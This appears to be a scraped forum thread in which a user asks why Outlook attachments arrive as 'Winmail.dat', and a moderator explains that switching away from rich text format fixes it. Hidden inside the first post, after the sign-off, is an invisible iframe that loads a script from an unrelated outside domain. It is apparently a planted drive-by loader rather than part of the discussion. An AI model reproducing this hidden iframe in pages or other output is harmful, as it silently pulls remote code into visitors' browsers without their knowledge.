+ Reply to Thread

OT: Computer question... "Winmail.dat"?

Hi all, I have a strange question...

When I email someone with a .jpg or .doc attached to it, quite often they receive it as a "Winmail.dat" file, which they can't open.
    And that is despite the fact that I sent it as a .jpg or .doc file.

Also, I sent an email with my resume (.doc) attached from my main email account to itself so that I could open it via SnapperMail on my 7135 (to test the new QuickOffice Premiere for Snapper) and get this: though on my PC the attached file arrived as a .doc that I could open, on my phone it arrived as a winmail.dat file.

This also happens when I send jpegs to friends, so it is not a Snapper or phone issue.

What the heck is going on? Is there some setting on my PC or Outlook that I need to change?

Has anyone else had this problem?

Thanks,<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    ~'kito
    pdaPhoneHome Moderator

You are using Outlook aren't you.

Double click the recipient and make sure it's being sent as either plain text, let Outlook decide, or HTML, and NOT rich text.

It has to do with a proprietary way it sends messages in rich text format, and encapsulates the formatted message and attachment in the dat file. I had the same problem until I changed that. You can set it globally in the Outlook options--->Mail format.

More info here:
    http://support.microsoft.com/default...en-us%3b278061

Note: I moved this here as I think it is not off-topic, and relevant to anyone sending attachments using Outlook to the 6035/7135.

Thanks so much SynC, I'll look into it.
    ~'kito
    pdaPhoneHome Moderator

There was talk of this same issue over in the SnapperMail forum. HotSync posted the Microsoft issue that was posted in the SM forum as well. This does indeed seem to take care of the problem.

Yep, that solved it. Thanks so much SynC! Man, that has been plaguing me for the past year! Wish I had asked sooner.
    ~'kito
    pdaPhoneHome Moderator

Yeah, I never really played with attachments much, but recently I have. I found this problem a couple weeks ago, and didn't investigate it until recently. Then I saw some discussion over on the snappermail forums ant that was the ticket.